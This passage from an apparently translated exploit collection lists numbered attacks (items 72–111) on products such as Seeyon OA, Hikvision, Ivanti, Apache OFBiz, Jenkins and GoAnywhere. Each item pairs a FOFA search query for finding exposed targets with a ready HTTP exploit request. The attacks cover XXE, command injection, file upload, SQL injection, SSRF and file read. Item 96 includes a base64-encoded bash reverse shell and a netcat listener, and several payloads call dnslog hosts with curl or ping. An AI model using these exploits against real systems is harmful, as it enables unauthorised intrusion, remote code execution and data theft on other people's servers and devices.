Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec Mobile Campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}


GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--


GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE flow control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>


GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it plants a Godzilla webshell
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAppSecurity Mingyu security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--


/jfhatuwe.php

88. DBAppSecurity Mingyu security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close


/astdfkhl.php

89. Seeyon FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi'anxin Legendsec SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi-Anxin Wangshen (网神) SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Put the generated payload in place of PAYLOAD in the POC:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML file contents; the XML file is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
